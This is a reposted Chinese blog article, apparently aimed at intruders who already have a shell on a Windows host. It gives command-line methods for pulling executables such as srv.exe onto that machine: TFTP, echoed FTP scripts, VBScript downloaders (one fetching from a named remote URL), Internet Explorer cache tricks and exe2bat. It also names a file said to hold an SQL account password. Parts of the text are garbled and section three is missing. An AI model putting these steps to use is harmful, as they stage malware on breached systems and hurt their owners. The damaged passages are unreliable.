文件上传八大法
来源:互联网 发布:雯雅婷桌面宠物改数据 编辑:程序博客网 时间:2024/06/06 18:30
本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.
一,TFTP
格式:tftp -i get file.exe path/file.exe 默认存放在system32下,如果指定就存在指定的地方。
二:ftp下载文件
ftp下载文件一般步骤如下:
echo open xxx.xxx.xxx.xxx 〉
echo user 〉〉
echo password 〉〉
echo binary 〉〉 [可选]
echo get srv.exe 〉〉
echo bye 〉〉
ftp -s:ftp.txt(这一步是关键哟)
del
这样srv.exe文件拖略谙吕戳恕1V rv.exe已经存在指定位置。
四:写程序下载
脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉webdown.vbs
echo xPost.Open "GET"," 〉〉webdown.vbs
echo xPost.Send() 〉〉webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") 〉〉webdown.vbs
echo sGet.Mode = 3 〉〉webdown.vbs
echo sGet.Type = 1 〉〉webdown.vbs
echo sGet.Open() 〉〉webdown.vbs
echo sGet.Write(xPost.responseBody) 〉〉webdown.vbs
echo sGet.SaveToFile "srv.exe",2 〉〉webdown.vbs
然后执行cscript webdown.vbs就可以啦。其中,http://txhak.126.com/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。 这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。
五:START ITS:HTTP://IP/文件名
然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"
然后DIR 文件名[1]
注意:那串长文件名要用""引起来,因为有空格
例子:C:\Documents and Settings\Administrator〉start its:http://xxx.xxx.xxx.xxx/srv.
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目录
2003-11-22 17:48 12,832 srv[1].exe
1 个文件 12,832 字节
列出所有文件:
1 个文件 12,832 字节
0 个目录 6,425,985,024 可用字节
C:\Documents and Settings\Administrator〉copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe
已复制 1 个文件
六。一句话下载。第4种方法的精简,有时很有用的
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 〉pig.vbs
七。写程序下载
echo iLocal = LCase(WScript.Arguments(1)) 〉c:\down.vbs
echo iRemote = LCase(WScript.Arguments(0)) 〉〉c:\down.vbs
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉〉c:\down.vbs
echo xPost.Open "GET",iRemote,0 〉〉c:\down.vbs
echo xPost.Send() 〉〉c:\down.vbs
echo Set sGet = CreateObject("ADODB.Stream") 〉〉c:\down.vbs
echo sGet.Mode = 3 〉〉c:\down.vbs
echo sGet.Type = 1 〉〉c:\down.vbs
echo sGet.Open() 〉〉c:\down.vbs
echo sGet.Write(xPost.responseBody) 〉〉c:\down.vbs
echo sGet.SaveToFile iLocal,2 〉〉c:\down.vbs
八.exe2bat命令行下输入,debug还原成文件
用exe2bat这个工具把exe文件转化成bat,然后一行行敲进去,这样工作量非常大,只适合于非常短小的文件
211.*.*.21/xxxx/GetAdminData.dat 为sql帐号的密码
- 文件上传八大法
- SpringMVC(八)文件上传
- 脱壳八大法
- struts(八)文件上传
- Spring Boot : 文件上传(八)
- SHELLCMD下文件上传大法
- 隐藏文件搜索大法
- 文件隐藏大法
- SpringMVC 学习笔记(八)文件上传
- (一二八)使用POST上传文件
- Spring MVC 学习笔记 八 文件上传
- ring3文件占坑大法
- 文件强行删除大法摘要
- R3文件占坑大法
- Yii2学习笔记(八):文件上传Upload
- PHP漏洞全解(八)-文件上传漏洞
- Struts2学习(八)—文件上传和下载
- 文件占坑,防止删除大法
- vim常用命令
- vector中存放函数指针
- js通用数据检测类(2)
- 用asp打开光驱!
- 让Asp.NET的DataGrid可排序、可选择、可分页
- 文件上传八大法
- Debian 7.4 64 位日常使用中的问题记录
- C++ VC MD5加密(信息摘要算法)示例
- datagridview的一些编程实例
- 在Ajax中什么时候用GET什么时候用POST?
- ASP错误编码大全
- JFLex用户手册中文版
- NYOJ 269 VF
- 如何样让datetime类型的数据只有年月日